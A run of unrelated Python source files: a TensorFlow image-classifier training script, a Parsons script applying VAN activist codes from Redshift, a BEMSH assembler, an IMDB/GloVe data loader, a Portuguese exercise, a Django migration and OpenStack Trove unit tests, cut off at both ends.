log_dir=LOG_DIR) print("Loaded! Ready for test!", flush=True) for a in range(tenum): aa = str(a+1) tdat_f = data_dir + '/data_test_{}.txt'.format(aa) tlab_f = data_dir + '/lab_test_{}.txt'.format(aa) HET, _ = load_HE_data(train_dat_name=tdat_f, train_lab_name=tlab_f, valid_dat_name=tdat_f, valid_lab_name=tlab_f) ppp = int(5000 / 1024) if tec > 5000: for b in range(ppp): bb = str(b+1) x, y = HET.validation.next_batch(1024) print('Test:') te, tenet, tew = m.inference(x) CAM(tenet, tew, te, x, y, dirr, 'Test_{}'.format(bb)) metrics(te, y, dirr, 'Test_{}'.format(bb)) tec = tec-5000 elif tec in range(1024, 5001): mppp = int(tec/1024) for b in range(mppp): bb = str(b+1+a*5) x, y = HET.validation.next_batch(1024) print('Test:') te, tenet, tew = m.inference(x) CAM(tenet, tew, te, x, y, dirr, 'Test_{}'.format(bb)) metrics(te, y, dirr, 'Test_{}'.format(bb)) else: print("Not enough for a test batch!") elif to_reload: if md == 'IG': m = cnng.INCEPTION(INPUT_DIM, HYPERPARAMS, meta_graph=to_reload, log_dir=LOG_DIR) elif md == 'I2': m = cnnt.INCEPTION(INPUT_DIM, HYPERPARAMS, meta_graph=to_reload, log_dir=LOG_DIR) elif md == 'I3': m = cnnm.INCEPTION(INPUT_DIM, HYPERPARAMS, meta_graph=to_reload, log_dir=LOG_DIR) elif md == 'I4': m = cnni.INCEPTION(INPUT_DIM, HYPERPARAMS, meta_graph=to_reload, log_dir=LOG_DIR) elif md == 'IR1': m = cnnir1.INCEPTION(INPUT_DIM, HYPERPARAMS, meta_graph=to_reload, log_dir=LOG_DIR) elif md == 'IR2': m = cnnir2.INCEPTION(INPUT_DIM, HYPERPARAMS, meta_graph=to_reload, log_dir=LOG_DIR) elif md == 'VA': m = cnnva.INCEPTION(INPUT_DIM, HYPERPARAMS, meta_graph=to_reload, log_dir=LOG_DIR) elif md == 'V16': m = cnnv16.INCEPTION(INPUT_DIM, HYPERPARAMS, meta_graph=to_reload, log_dir=LOG_DIR) elif md == 'V19': m = cnnv19.INCEPTION(INPUT_DIM, HYPERPARAMS, meta_graph=to_reload, log_dir=LOG_DIR) else: m = cnng.INCEPTION(INPUT_DIM, HYPERPARAMS, meta_graph=to_reload, log_dir=LOG_DIR) print("Loaded! Restart training.", flush=True) for a in range(trnum): aa = str(a + 1) dat_f = data_dir + '/data_{}.txt'.format(aa) lab_f = data_dir + '/lab_{}.txt'.format(aa) HE, sz = load_HE_data(train_dat_name=dat_f, train_lab_name=lab_f, valid_dat_name=dat_f, valid_lab_name=lab_f) old_ITER = m.get_global_step(HE)[0] if sz < 4998: reITER = int(sz * reITER/5000) MAX_ITER = old_ITER + reITER else: MAX_ITER = old_ITER + reITER if a == trnum-1: m.train(HE, max_iter=MAX_ITER, max_epochs=MAX_EPOCHS, verbose=True, save=True, outdir=METAGRAPH_DIR) else: m.train(HE, max_iter=MAX_ITER, max_epochs=MAX_EPOCHS, verbose=True, save=False, outdir=METAGRAPH_DIR) if trc > 1026: x, y = HE.validation.next_batch(1024) print('Generating metrics') tr, trnet, trw = m.inference(x) CAM(trnet, trw, tr, x, y, dirr, 'Train_{}'.format(aa)) metrics(tr, y, dirr, 'Train_{}'.format(aa)) elif trc in range(50, 1026): x, y = HE.validation.next_batch(trc) print('Generating metrics') tr, trnet, trw = m.inference(x) CAM(trnet, trw, tr, x, y, dirr, 'Train_{}'.format(aa)) metrics(tr, y, dirr, 'Train_{}'.format(aa)) else: print("The last training set is too small! 
No metrics generated.") trc -= 5000 for at in range(tenum): aat = str(at+1) tdat_f = data_dir + '/data_test_{}.txt'.format(aat) tlab_f = data_dir + '/lab_test_{}.txt'.format(aat) HET, _ = load_HE_data(train_dat_name=tdat_f, train_lab_name=tlab_f, valid_dat_name=tdat_f, valid_lab_name=tlab_f) ppp = int(5000 / 1024) if tec > 5000: for b in range(ppp): bb = str(b+1) x, y = HET.validation.next_batch(1024) print('Test:') te, tenet, tew = m.inference(x) CAM(tenet, tew, te, x, y, dirr, 'Test_{}'.format(bb)) metrics(te, y, dirr, 'Test_{}'.format(bb)) tec = tec-5000 elif tec in range(1024, 5001): mppp = int(tec/1024) for b in range(mppp): bb = str(b+1+at*5) x, y = HET.validation.next_batch(1024) print('Test:') te, tenet, tew = m.inference(x) CAM(tenet, tew, te, x, y, dirr, 'Test_{}'.format(bb)) metrics(te, y, dirr, 'Test_{}'.format(bb)) else: print("Not enough for a test batch!") else: # train if md == 'IG': m = cnng.INCEPTION(INPUT_DIM, HYPERPARAMS, log_dir=LOG_DIR) elif md == 'I2': m = cnnt.INCEPTION(INPUT_DIM, HYPERPARAMS, log_dir=LOG_DIR) elif md == 'I3': m = cnnm.INCEPTION(INPUT_DIM, HYPERPARAMS, log_dir=LOG_DIR) elif md == 'I4': m = cnni.INCEPTION(INPUT_DIM, HYPERPARAMS, log_dir=LOG_DIR) elif md == 'IR1': m = cnnir1.INCEPTION(INPUT_DIM, HYPERPARAMS, log_dir=LOG_DIR) elif md == 'IR2': m = cnnir2.INCEPTION(INPUT_DIM, HYPERPARAMS, log_dir=LOG_DIR) elif md == 'VA': m = cnnva.INCEPTION(INPUT_DIM, HYPERPARAMS, log_dir=LOG_DIR) elif md == 'V16': m = cnnv16.INCEPTION(INPUT_DIM, HYPERPARAMS, log_dir=LOG_DIR) elif md == 'V19': m = cnnv19.INCEPTION(INPUT_DIM, HYPERPARAMS, log_dir=LOG_DIR) else: m = cnng.INCEPTION(INPUT_DIM, HYPERPARAMS, log_dir=LOG_DIR) print("Start training!") for a in range(trnum): aa = str(a + 1) dat_f = data_dir + '/data_{}.txt'.format(aa) lab_f = data_dir + '/lab_{}.txt'.format(aa) HE, sz = load_HE_data(train_dat_name=dat_f, train_lab_name=lab_f, valid_dat_name=dat_f, valid_lab_name=lab_f) if sz < 4998: modITER = int(sz * reITER / 5000) MAX_ITER = old_ITER + reITER * a + modITER else: MAX_ITER = old_ITER + reITER * (a + 1) if a == trnum-1: m.train(HE, max_iter=MAX_ITER, max_epochs=MAX_EPOCHS, verbose=True, save=True, outdir=METAGRAPH_DIR) else: m.train(HE, max_iter=MAX_ITER, max_epochs=MAX_EPOCHS, verbose=True, save=False, outdir=METAGRAPH_DIR) if trc > 1026: x, y = HE.validation.next_batch(1024) print('Generating metrics') tr, trnet, trw = m.inference(x) CAM(trnet, trw, tr, x, y, dirr, 'Train_{}'.format(aa)) metrics(tr, y, dirr, 'Train_{}'.format(aa)) elif trc in range(50, 1026): x, y = HE.validation.next_batch(trc) print('Generating metrics') tr, trnet, trw = m.inference(x) CAM(trnet, trw, tr, x, y, dirr, 'Train_{}'.format(aa)) metrics(tr, y, dirr, 'Train_{}'.format(aa)) else: print("The last training set is too small! 
No metrics generated.") trc -= 5000 for at in range(tenum): aat = str(at + 1) tdat_f = data_dir + '/data_test_{}.txt'.format(aat) tlab_f = data_dir + '/lab_test_{}.txt'.format(aat) HET, _ = load_HE_data(train_dat_name=tdat_f, train_lab_name=tlab_f, valid_dat_name=tdat_f, valid_lab_name=tlab_f) ppp = int(5000 / 1024) if tec > 5000: for b in range(ppp): bb = str(b + 1) x, y = HET.validation.next_batch(1024) print('Test:') te, tenet, tew = m.inference(x) CAM(tenet, tew, te, x, y, dirr, 'Test_{}'.format(bb)) metrics(te, y, dirr, 'Test_{}'.format(bb)) tec = tec - 5000 elif tec in range(1024, 5001): mppp = int(tec / 1024) for b in range(mppp): bb = str(b + 1 + at * 5) x, y = HET.validation.next_batch(1024) print('Test:') te, tenet, tew = m.inference(x) CAM(tenet, tew, te, x, y, dirr, 'Test_{}'.format(bb)) metrics(te, y, dirr, 'Test_{}'.format(bb)) else: print("Not enough for a test batch!") if __name__ == "__main__": tf.reset_default_graph() for DIR in (LOG_DIR, METAGRAPH_DIR, data_dir, out_dir): try: os.mkdir(DIR) except(FileExistsError): pass if not os.path.isfile(img_dir+'/te_sample.csv'): _, _, _, tes, trs = Sample_prep.samplesum() tes.to_csv(img_dir+'/te_sample.csv', index=False) trs.to_csv(img_dir+'/tr_sample.csv', index=False) trc, tec, trnum, tenum = counters(img_dir) try: modeltoload = sys.argv[5] try: testmode = sys.argv[6] main(tenum, trnum, trc, tec, to_reload=modeltoload, log_dir=LOG_DIR, test=True) except(IndexError): main(tenum, trnum, trc, tec, reITER=iter, to_reload=modeltoload, log_dir=LOG_DIR) except(IndexError): if not os.path.isfile(data_dir + '/lab_test_{}.txt'.format(str(tenum))): loader(img_dir) main(tenum, trnum, trc, tec, reITER=iter, old_ITER=0) 1-10 # ### METADATA # Connectors: Redshift, VAN # Description: Gets activist codes stored in redshift and applies to users in Van # Parsons Version: unknown # ### CONFIGURATION # Set the configuration variables below or set environmental variables of the # same name and leave these # with empty strings. We recommend using environmental variables if possible. 
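# For example, rather than editing config_vars below, the same settings could be
# exported as environment variables before running this script (hypothetical
# values shown for illustration only):
#
#     export REDSHIFT_HOST=example-cluster.redshift.amazonaws.com
#     export REDSHIFT_PORT=5439
#     export REDSHIFT_DB=analytics
#     export REDSHIFT_CREDENTIAL_USERNAME=my_user
#     export REDSHIFT_CREDENTIAL_PASSWORD=my_password
#     export VAN_DB_NAME=MyVoters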
config_vars = { # Redshift "REDSHIFT_PORT": "", "REDSHIFT_DB": "", "REDSHIFT_HOST": "", "REDSHIFT_CREDENTIAL_USERNAME": "", "REDSHIFT_CREDENTIAL_PASSWORD": "", # Van "VAN_PASSWORD": "", "VAN_DB_NAME": "" } # ### CODE from parsons import Table, Redshift, VAN # noqa E402 from parsons import logger # noqa E402 import os # noqa E402 # Setup for name, value in config_vars.items(): # sets variables if provided in this script if value.strip() != "": os.environ[name] = value rs = Redshift() # just create Redshift() - VAN connector is created dynamically below # Create dictionary of VAN states and API keys from multiline Civis credential myv_states = {x.split(",")[0]: x.split(",")[1] for x in os.environ['VAN_PASSWORD'].split("\r\n")} myv_keys = {k: VAN(api_key=v, db=os.environ['VAN_DB_NAME']) for k, v in myv_states.items()} # Create simple set of states for insertion into SQL states = "','".join([s for s in myv_keys]) # SQL to pull those needing Activist Code sql = f""" SELECT vb_smartvan_id , vb_vf_source_state , hash , activist_code_id FROM schema.table WHERE vb_vf_source_state IN ({states}) """ records = rs.query(sql) logger.info(f"Applying Activist Codes to {str(records.num_rows)} records...") # Apply codes segmented by state (different API Keys) for state, key in myv_keys.items(): state_set = records.select_rows(lambda row: row.vb_vf_source_state == state) if len(state_set) > 0: logger.info(f"Applying {str(len(state_set))} Activist Codes in {state}...") for vanid in state_set: # TODO: row undefined, select row form record? row = None key.toggle_activist_code(row['vb_smartvan_id'], row['activist_code_id'], 'apply') # -*- coding: utf-8 -*- """ BEMSH-subset assembler """ import re from pprint import pprint from ply import lex, yacc """ В трансляторе БЕМШ зарезервированы следующие управляюще команды: """ TRAN_KEYWORDS = ("код", "старт", "финиш", "адрес", "литер", "стрн", "строк", "экв", "пам", "конд", "текст", "конк", "употр", "отмен", "входн", "внеш") """ Список коротких программ в порядке возрастания кода операции """ OP_SHORT = ("зп", "зпм", "рег", "счм", "сл", "вч", "вчоб", "вчаб", "сч", "и", "нтж", "слц", "знак", "или", "дел", "умн", "сбр", "рзб", "чед", "нед", "слп", "вчп", "сд", "рж", "счрж", "счмр", "э32", "увв", "слпа", "вчпа", "сда", "ржа", "уи", "уим", "счи", "счим", "уии", "сли", "э46", "э47", "э50", "э51", "э52", "э53", "э54", "э55", "э56", "э57", "э60", "э61", "э62", "э63", "э64", "э65", "э66", "э67", "э70", "э71", "э72", "э73", "э74", "э75", "э76", "э77") """ Список длинных команд в порядке возростания кода операции """ OP_LONG = ("э20", "э21", "мода", "мод", "уиа", "слиа", "по", "пе", "пб", "пв", "выпр", "стоп", "пио", "пино", "э36", "цикл") """ Ключевые слова компилятора """ KEYWORDS = OP_SHORT + OP_LONG """ Словарь соответсвия мнемонике коду операции """ OPCODE_NUM = {KEYWORDS[i]: i for i in range(0, len(KEYWORDS))} """ Распознаваемые токены для лекс. 
анализатора """ tokens = ( 'ID', 'NUMBER', 'NEWLINE', 'OPCODE', 'TRAN' ) """ Литералы """ literals = ['(', ')', '+', '-', '*', '/'] """ Комментарии пропускаем """ t_ignore_COMMENT = r'[\*;].*' def t_NUMBER(t): r'(м\d+)?((\'?-?\d+\'?)|([вbк]\'\d+\')|(п\'.*\'))' if t.value[0] == '\'': t.value = int(t.value[1:-1], 8) elif t.value[0] in 'кk': t.value = int(t.value[2:-1], 2) elif t.value[0] in 'вbк': t.value = int(t.value[2:-1], 8) elif t.value[0] == 'п': t.value = t.value[2:-1] elif t.value[0] == 'м': # TODO: константа со здвигом влево p = r"м(?P\d+)[вb]'(?P\d+)'" res = re.findall(p, t.value) t.value = int(res[0][1], 8) << int(res[0][0]) else: t.value = int(t.value) return t t_ignore = " \r\t" def t_NEWLINE(t): r'\n' t.lexer.lineno += 1 return t def t_ID(t): r'[a-zA-Zа-яА-Я]+[a-zA-Zа-яА-Я0-9]*' if t.value in TRAN_KEYWORDS: t.type = 'TRAN' elif t.value in KEYWORDS: t.type = 'OPCODE' return t def t_error(t): print("Illegal character '%s' at line %d" % (t.value[0], t.lexer.lineno)) lexer = lex.lex(reflags=re.UNICODE) precedence = ( ('left', '+', '-'), # ('left', '*', '/'), # ('right', 'UMINUS'), ) def p_prog_list(p): '''prog : prog statement | statement''' if len(p) == 2: if p[1] is None: p[1] = [('EMPTY', 0, 0)] p[0] = [p[1]] elif len(p) == 3: #print(p[0], p[1], p[2]) if p[2] is not None: p[1].append(p[2]) p[0] = p[1] def p_tran_directive(p): '''tran_dir : TRAN NUMBER | TRAN''' if len(p) == 2: p[0] = ('TRAN', p[1]) else: p[0] = ('TRAN', p[1], p[2]) def p_expr(p): """ expr : NUMBER | ID | expr '+' expr | expr '-' expr""" if len(p) == 2: # print(p[1], p.lexer.lexdata, repr(p)) if not isinstance(p[1], int): p[0] = ('LABEL', p[1]) else: p[0] = p[1] elif len(p) == 4: if isinstance(p[1], int) and isinstance(p[3], int): if p[2] == '+': p[0] = p[1] + p[3] else: p[0] = p[1] - p[3] else: p[0] = (p[2], p[1], p[3]) def p_addr(p): """addr : expr | expr '(' expr ')' | '(' expr ')'""" if len(p) == 2: p[0] = {"offset": p[1], "idx": 0} elif len(p) == 5: p[0] = {"offset": p[1], "idx": p[3]} elif len(p) == 4: p[0] = {"offset": 0, "idx": p[2]} def p_instruction(p): ''' instruction : OPCODE | OPCODE addr''' if len(p) == 3: p[0] = ('OPCODE', p[1], p[2]) else: p[0] = ('OPCODE', p[1], {"offset": 0, "idx": 0}) def p_label(p): '''statement : ID''' p[0] = ('LABEL', p[1]) def p_stat_nl(p): '''statement : NEWLINE''' def p_statement(p): '''statement : tran_dir NEWLINE | instruction NEWLINE''' p[0] = p[1] def p_error(p): if p: print("Syntax error at '%s'" % p.value, p.lineno) else: print("Syntax error at EOF") exit() def collect_labels(prog): """ Сбор меток """ labels = {} for i in prog: if i[0] == 'LABEL': labels[i[1]] = None return labels def calc_tree(labels, expr): """ Вычисление адресного выражения операнда команды """ if isinstance(expr, int): return expr if expr[0] == 'LABEL': result = labels[expr[1]] elif expr[0] == '+': result = calc_tree(labels, expr[1]) + calc_tree(labels, expr[2]) elif expr[0] == '-': result = calc_tree(labels, expr[1]) - calc_tree(labels, expr[2]) else: print("Unkonown oper in expr", expr) return result def pack_instructions(prog): """ Укладывание команд в память во внутреннее представление программы """ cur_addr = 0 # адрес в полусловах, т.е. 
одно слово занимает два полуслова # проход по дереву - определение списка меток labels = collect_labels(prog) memory = [] # проход по дереву - укладывание команд в память for i in prog: if i[0] == 'LABEL': # если метка и правая команда if cur_addr % 2 == 1: # то вставляема "мода 0" memory.append( (cur_addr, ('OPCODE', 'мода', { 'idx': 0, 'offset': 0}))) cur_addr += 1 labels[i[1]] = cur_addr // 2 # сопоставление адрес соотв. метке # в машинных словах continue elif i[0] == 'TRAN': if i[1] == 'старт' or i[1] == 'адрес': cur_addr = int(i[2]) * 2 # директива старт elif i[1] == 'конд': # длинная константа занимает одно слово if cur_addr % 2 == 1: # поэтому выравниваем если необходимо memory.append( (cur_addr, ('OPCODE', 'мода', { 'idx': 0, 'offset': 0}))) cur_addr += 1 memory.append((cur_addr, ('TRAN', 'конк', i[2] >> 24))) memory.append((cur_addr+1, ('TRAN', 'конк', i[2] & 0o77777777))) cur_addr += 2 elif i[1] == 'конк': # короткая константа занимает полуслово memory.append((cur_addr, i)) cur_addr += 1 elif i[1] == 'текст': # укладываем текст по 6 букв в машинные слова j = 0 text = i[2].encode('utf-8') while j < len(text): t = text[j:j + 6] j += 6 if len(t) < 6: t += b' ' * (6 - len(t)) memory.append((cur_addr, ('TRAN', 'конк', t[:3]))) memory.append((cur_addr + 1, ('TRAN', 'конк', t[3:]))) cur_addr += 2 else: print("Неизвестная директива", i[1]) exit() continue elif i[0] == 'OPCODE': memory.append((cur_addr, i)) cur_addr += 1 continue else: print("Warning: Unknown token:", i) if cur_addr % 2 == 1: memory.append((cur_addr, ('OPCODE', 'мода', {'idx': 0, 'offset': 0}))) print("Внутреннее представление:") for m in memory: print('Address: {:0>8o} Data: {:0>20}'.format(m[0] // 2, str(m[1]))) print("Адреса меток:") for m in labels.items(): print('Label: {:<8} Address: {:0>5o}'.format(m[0], m[1])) # после того как стали известны адреса меток, # вычислим адресные выражения команд for i in range(0, len(memory)): if memory[i][1][0] == 'OPCODE' and not isinstance( memory[i][1][2]['offset'], int): memory[i][1][2]['offset'] = calc_tree( labels, memory[i][1][2]['offset']) return memory def gen_instr(cmd): """ Получение машинного кода по мнемонике и адресному выражению """ global OPCODE_NUM op = 0 if cmd[0] == 'OPCODE': mc = ((cmd[2]['idx'] << 20) & 0o74000000) if cmd[1] in OP_SHORT: op = (OPCODE_NUM[cmd[1]] << 12) & 0o770000 op |= (cmd[2]['offset'] & 0o7777) else: op = (OPCODE_NUM[cmd[1]] << 15) & 0o3700000 | 0o2000000 op |= (cmd[2]['offset'] & 0o77777) op |= mc elif cmd[0] == 'TRAN' and cmd[1] == 'конк': if isinstance(cmd[2], int): op = cmd[2] else: op = (cmd[2][0] << 16) | (cmd[2][1] << 8) | cmd[2][2] return op def gen_mcode(mem): """ Укладывание двух команд или коротких констант в машинное слово """ mem_ret = [] i = 0 while i < len(mem)-1: mem_ret.append((mem[i][0]//2, (gen_instr(mem[i][1])<<24) | gen_instr(mem[i+1][1]))) i += 2 return mem_ret yacc.yacc() # ШАГ 1. Построение дерева разбора prog = yacc.parse(open('simple.bemsh', encoding='utf-8').read()) print("Дерево разбора: ") pprint(prog) # ШАГ 2. Укладывание инструкций/констант в память и определение адресов меток mem = pack_instructions(prog) print("Вычисленные метки прописаны:") pprint(mem) # ШАГ 3. 
Генерирование машинного кода с упаковкой в слова по 48-бит mem = gen_mcode(mem) print("Машинный код") for m in mem: print('Address: {:>6o} Data: {:0>16o}'.format(m[0], m[1]))import os import numpy as np from keras.preprocessing.text import Tokenizer from keras.preprocessing.sequence import pad_sequences from sklearn.utils import shuffle def load_data(): # neg = 0, pos = 1 X_train, Y_train, X_test, Y_test = [], [], [], [] # Prepare paths data_path = os.path.join(os.getcwd(), "data") train_neg_path = os.path.join(data_path, "train", "neg") train_pos_path = os.path.join(data_path, "train", "pos") test_neg_path = os.path.join(data_path, "test", "neg") test_pos_path = os.path.join(data_path, "test", "pos") # Load training data for filename in os.listdir(train_neg_path): with open(os.path.join(train_neg_path, filename), encoding="utf8") as f: review = f.readline() X_train.append(review) Y_train.append(0) for filename in os.listdir(train_pos_path): with open(os.path.join(train_pos_path, filename), encoding="utf8") as f: review = f.readline() X_train.append(review) Y_train.append(1) print("Training data loaded") # Load test data for filename in os.listdir(test_neg_path): with open(os.path.join(test_neg_path, filename), encoding="utf8") as f: review = f.readline() X_test.append(review) Y_test.append(0) for filename in os.listdir(test_pos_path): with open(os.path.join(test_pos_path, filename), encoding="utf8") as f: review = f.readline() X_test.append(review) Y_test.append(1) print("Test data loaded") return X_train, Y_train, X_test, Y_test def preprocess_data(X_train, Y_train, X_test, Y_test, input_len): # Load vocabulary vocab_path = os.path.join(os.getcwd(), "data", "imdb.vocab") with open(vocab_path, encoding="utf8") as f: vocab = f.read().splitlines() print("Vocabulary length before tokenizing: " + str(len(vocab))) # Prepare tokenizer, the out of vocabulary token for GloVe is "unk" tokenizer = Tokenizer(oov_token="unk") tokenizer.fit_on_texts(vocab) vocab_len = len(tokenizer.word_index) + 1 print("Vocabulary length after tokenizing: " + str(vocab_len)) # Convert text to sequences of indices X_train = tokenizer.texts_to_sequences(X_train) X_test = tokenizer.texts_to_sequences(X_test) # Pad sequences with zeros so they all have the same length X_train = pad_sequences(X_train, maxlen=input_len, padding="post") X_test = pad_sequences(X_test, maxlen=input_len, padding="post") # Convert training and test data to numpy arrays X_train = np.array(X_train, dtype="float32") Y_train = np.array(Y_train, dtype="float32") X_test = np.array(X_test, dtype="float32") Y_test = np.array(Y_test, dtype="float32") # Shuffle training and test data X_train, Y_train = shuffle(X_train, Y_train) X_test, Y_test = shuffle(X_test, Y_test) # Split test data into validation and test sets split_index = int(0.5 * X_test.shape[0]) X_val = X_test[split_index:] Y_val = Y_test[split_index:] X_test = X_test[:split_index] Y_test = Y_test[:split_index] return X_train, Y_train, X_val, Y_val, X_test, Y_test, tokenizer def create_embedding_matrix(tokenizer): # Load GloVe embedding vectors embedding_path = os.path.join(os.getcwd(), "data", "glove.6B", "glove.6B.100d.txt") word_to_embedding = {} with open(embedding_path, encoding="utf8") as f: for line in f.readlines(): values = line.split() word = values[0] embedding_vec = np.asarray(values[1:], dtype="float32") word_to_embedding[word] = embedding_vec print("Embedding vectors loaded") # Create embedding matrix embedding_vec_dim = 100 vocab_len = len(tokenizer.word_index) + 1 
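# (The +1 above is because Keras' Tokenizer assigns word indices starting at 1
# and reserves index 0 for padding, so the embedding matrix built below needs one
# extra row; row 0 is left as zeros.)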
embedding_matrix = np.zeros((vocab_len, embedding_vec_dim)) for word, i in tokenizer.word_index.items(): embedding_vec = word_to_embedding.get(word) if embedding_vec is not None: embedding_matrix[i] = embedding_vec print("Embedding matrix created") return embedding_matrix vaniaferreira/Python #Crie um programa que tenha uma tupla com várias palavras(Não usar acentos). #Depois disto, você deve mostrar, para cada palavra, quais são suas vogais. palavras = ('Mamão','Pao','Queijo', 'Danone', 'Cafe', 'Leite') for p in palavras: print(f'\nNa palavra {p.upper()} temos: ',end='') for letra in p: if letra.lower() in ('aeiou'): print(letra, end=' ') Scud17/cattitude # Generated by Django 3.2 on 2021-05-03 03:58 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('units', '0002_unit_to_si_unit'), ('products', '0001_initial'), ] operations = [ migrations.AddField( model_name='product', name='unit', field=models.ForeignKey(default='1', on_delete=django.db.models.deletion.CASCADE, to='units.unit'), ), ] # Copyright 2012 OpenStack Foundation # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import os from mock import DEFAULT from mock import MagicMock from mock import patch from proboscis.asserts import assert_equal from testtools.matchers import Is, Equals, Not from trove.common.db.mysql import models from trove.common.exception import InsufficientSpaceForReplica from trove.common.exception import ProcessExecutionError from trove.common import instance as rd_instance from trove.guestagent import backup from trove.guestagent.common import operating_system # TODO(atomic77) The test cases should be made configurable # to make it easier to test the various derived datastores. 
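# Note on the mock imports above: DEFAULT is a sentinel used with patch.multiple
# (see _prepare_dynamic below) so that several attributes are replaced by
# autogenerated MagicMocks in a single decorator and passed to the decorated test
# as keyword arguments. A minimal, self-contained sketch of that pattern
# (illustrative only, not part of this test suite):
#
#     from unittest.mock import patch, DEFAULT
#
#     class Service(object):
#         def ping(self):
#             return "pong"
#
#     @patch.multiple(Service, ping=DEFAULT)
#     def check(ping):
#         ping.return_value = "mocked"
#         assert Service().ping() == "mocked"
#
#     check()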
from trove.guestagent.datastore.mysql.manager import Manager import trove.guestagent.datastore.mysql.service as dbaas from trove.guestagent import dbaas as base_dbaas from trove.guestagent import pkg from trove.guestagent import volume from trove.guestagent.volume import VolumeDevice from trove.tests.unittests.guestagent.test_datastore_manager import \ DatastoreManagerTest from trove.tests.unittests import trove_testtools class GuestAgentManagerTest(DatastoreManagerTest): def setUp(self): super(GuestAgentManagerTest, self).setUp('mysql') self.context = trove_testtools.TroveTestContext(self) self.replication_strategy = 'MysqlGTIDReplication' self.patch_rs = patch( 'trove.guestagent.strategies.replication.get_strategy', return_value=self.replication_strategy) self.mock_rs = self.patch_rs.start() self.addCleanup(self.patch_rs.stop) self.manager = Manager() self.origin_MySqlAppStatus = dbaas.MySqlAppStatus.get self.origin_os_path_exists = os.path.exists self.origin_format = volume.VolumeDevice.format self.origin_migrate_data = volume.VolumeDevice.migrate_data self.origin_mount = volume.VolumeDevice.mount self.origin_unmount = volume.VolumeDevice.unmount self.origin_mount_points = volume.VolumeDevice.mount_points self.origin_stop_mysql = dbaas.MySqlApp.stop_db self.origin_start_mysql = dbaas.MySqlApp.start_mysql self.origin_update_overrides = dbaas.MySqlApp.update_overrides self.origin_install_if_needed = dbaas.MySqlApp.install_if_needed self.origin_secure = dbaas.MySqlApp.secure self.origin_secure_root = dbaas.MySqlApp.secure_root self.origin_pkg_is_installed = pkg.Package.pkg_is_installed self.origin_os_path_exists = os.path.exists self.origin_chown = operating_system.chown # set up common mock objects, etc. for replication testing self.patcher_gfvs = patch( 'trove.guestagent.dbaas.get_filesystem_volume_stats') self.patcher_rs = patch( 'trove.guestagent.strategies.replication.get_instance') self.mock_gfvs_class = self.patcher_gfvs.start() self.mock_rs_class = self.patcher_rs.start() def tearDown(self): super(GuestAgentManagerTest, self).tearDown() dbaas.MySqlAppStatus.get = self.origin_MySqlAppStatus os.path.exists = self.origin_os_path_exists volume.VolumeDevice.format = self.origin_format volume.VolumeDevice.migrate_data = self.origin_migrate_data volume.VolumeDevice.mount = self.origin_mount volume.VolumeDevice.unmount = self.origin_unmount volume.VolumeDevice.mount_points = self.origin_mount_points dbaas.MySqlApp.stop_db = self.origin_stop_mysql dbaas.MySqlApp.start_mysql = self.origin_start_mysql dbaas.MySqlApp.update_overrides = self.origin_update_overrides dbaas.MySqlApp.install_if_needed = self.origin_install_if_needed dbaas.MySqlApp.secure = self.origin_secure dbaas.MySqlApp.secure_root = self.origin_secure_root operating_system.chown = self.origin_chown pkg.Package.pkg_is_installed = self.origin_pkg_is_installed os.path.exists = self.origin_os_path_exists # teardown the replication mock objects self.patcher_gfvs.stop() self.patcher_rs.stop() def test_update_status(self): mock_status = MagicMock() mock_status.is_installed = True mock_status._is_restarting = False dbaas.MySqlAppStatus.get = MagicMock(return_value=mock_status) self.manager.update_status(self.context) self.assertTrue(mock_status.set_status.called) def _empty_user(self): return models.MySQLUser(deserializing=True) def test_valid_host_name(self): test_host = "172.16.31.10/255.255.255.0" user = self._empty_user() user.host = test_host self.assertEqual(test_host, user.host) @patch.object(dbaas.MySqlAdmin, 'create_database') 
def test_create_database(self, create_db_mock): self.manager.create_database(self.context, ['db1']) create_db_mock.assert_any_call(['db1']) @patch.object(dbaas.MySqlAdmin, 'create_user') def test_create_user(self, create_user_mock): self.manager.create_user(self.context, ['user1']) create_user_mock.assert_any_call(['user1']) @patch.object(dbaas.MySqlAdmin, 'delete_database') def test_delete_database(self, delete_database_mock): databases = ['db1'] self.manager.delete_database(self.context, databases) delete_database_mock.assert_any_call(databases) @patch.object(dbaas.MySqlAdmin, 'delete_user') def test_delete_user(self, delete_user_mock): user = ['user1'] self.manager.delete_user(self.context, user) delete_user_mock.assert_any_call(user) @patch.object(dbaas.MySqlAdmin, 'grant_access') def test_grant_access(self, grant_access_mock): username = "test_user" hostname = "test_host" databases = ["test_database"] self.manager.grant_access(self.context, username, hostname, databases) grant_access_mock.assert_any_call(username, hostname, databases) @patch.object(dbaas.MySqlAdmin, 'list_databases', return_value=['database1']) def test_list_databases(self, list_databases_mock): databases = self.manager.list_databases(self.context) self.assertThat(databases, Not(Is(None))) self.assertThat(databases, Equals(list_databases_mock.return_value)) list_databases_mock.assert_any_call(None, None, False) @patch.object(dbaas.MySqlAdmin, 'list_users', return_value=['user1']) def test_list_users(self, list_users_mock): users = self.manager.list_users(self.context) self.assertThat(users, Equals(list_users_mock.return_value)) dbaas.MySqlAdmin.list_users.assert_any_call(None, None, False) @patch.object(dbaas.MySqlAdmin, 'get_user', return_value=['user1']) def test_get_users(self, get_user_mock): username = ['user1'] hostname = ['host'] users = self.manager.get_user(self.context, username, hostname) self.assertThat(users, Equals(get_user_mock.return_value)) get_user_mock.assert_any_call(username, hostname) @patch.object(dbaas.MySqlAdmin, 'enable_root', return_value='user_id_stuff') def test_enable_root(self, enable_root_mock): user_id = self.manager.enable_root(self.context) self.assertThat(user_id, Is(enable_root_mock.return_value)) enable_root_mock.assert_any_call() @patch.object(dbaas.MySqlAdmin, 'disable_root') def test_disable_root(self, disable_root_mock): self.manager.disable_root(self.context) disable_root_mock.assert_any_call() @patch.object(dbaas.MySqlAdmin, 'is_root_enabled', return_value=True) def test_is_root_enabled(self, is_root_enabled_mock): is_enabled = self.manager.is_root_enabled(self.context) self.assertThat(is_enabled, Is(is_root_enabled_mock.return_value)) is_root_enabled_mock.assert_any_call() @patch.object(backup, 'backup') def test_create_backup(self, backup_mock): # entry point Manager().create_backup(self.context, 'backup_id_123') # assertions backup_mock.assert_any_call(self.context, 'backup_id_123') def test_prepare_device_path_true(self): self._prepare_dynamic() def 